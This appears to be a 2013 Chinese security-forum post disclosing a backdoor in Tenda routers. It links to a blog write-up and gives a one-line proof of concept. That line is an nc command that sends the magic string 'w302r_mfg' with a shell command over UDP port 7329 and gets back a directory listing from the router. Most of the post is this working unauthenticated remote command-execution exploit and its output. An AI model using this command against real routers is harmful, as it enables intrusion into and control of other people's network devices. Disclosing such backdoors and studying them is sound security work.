社区首页 › 漏洞情报 › Tenda路由器后门

a13775647904 发表于 2013-10-21 07:51:08

Tenda路由器后门

同一个网站爆的，只需发送一个udp包，围观地址：
http://www.devttys0.com/2013/10/from-china-with-love/

poc

代码:
$ echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 192.168.0.1 7329
drwxr-xr-x    2 0      0       1363 webroot
drwxr-xr-x    1 0      0       0 var
drwxr-xr-x    5 0      0       43 usr
drwxr-xr-x    1 0      0       0 tmp
drwxr-xr-x    2 0      0       3 sys
drwxr-xr-x    2 0      0       569 sbin
dr-xr-xr-x   39 0      0       0 proc
drwxr-xr-x    2 0      0       3 mnt
drwxr-xr-x    1 0      0       0 media
drwxr-xr-x    4 0      0       821 lib
lrwxrwxrwx    1 0      0       11 init -> bin/busybox
drwxr-xr-x    2 0      0       3 home
drwxr-xr-x    7 0      0       154 etc_ro
drwxr-xr-x    1 0      0       0 etc
drwxr-xr-x    1 0      0       0 dev
drwxr-xr-x    2 1000   100   574 bin

查看完整版本: Tenda路由器后门